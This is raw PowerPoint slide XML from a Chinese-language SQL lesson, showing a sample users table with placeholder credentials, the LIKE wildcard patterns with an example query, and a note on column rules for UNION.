                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289602206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2781414587"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334648633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527666147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Bob</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>123</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="656364240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>user1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>pass1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831422024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31CB2A8D-3ABC-48F1-AB6A-09D00050F790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590957" y="1635224"/>
            <a:ext cx="997017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8168EF2C-BAC6-42FC-93C3-525682C11B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675054" y="2905651"/>
            <a:ext cx="1107996" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注意：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9D37D11-0313-4B7C-B517-55FCD2DF9249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894393" y="3497508"/>
            <a:ext cx="5440697" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后面的表达式有四种匹配模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="表格 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F94B569-25A8-48D7-B855-E461AA23576A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3624672996"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="428990" y="4030725"/>
          <a:ext cx="5788886" cy="2296160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="544830">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3024157539"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5244056">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3472195623"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>%</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>表示任意</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>个或多个字符。可匹配任意类型和长度的字符</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="36185984"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>_</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>表示任意单个字符</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2762343536"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>[ ]</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>表示括号内所列字符中的一个（类似正则表达式）。指定一个字符、字符串或范围，要求所匹配对象为它们中的任一个</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="587948156"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>[^ ]</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>表示不在括号所列之内的单个字符</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="759754399"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC14FFC-56D1-4A99-B003-A1D0C665BAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6255090" y="4027681"/>
            <a:ext cx="727721" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C749328-02B7-44F2-8388-5A9792F2EE20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217876" y="4501700"/>
            <a:ext cx="5522666" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  * from users where id like “A%”;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3330509439"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="363281"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
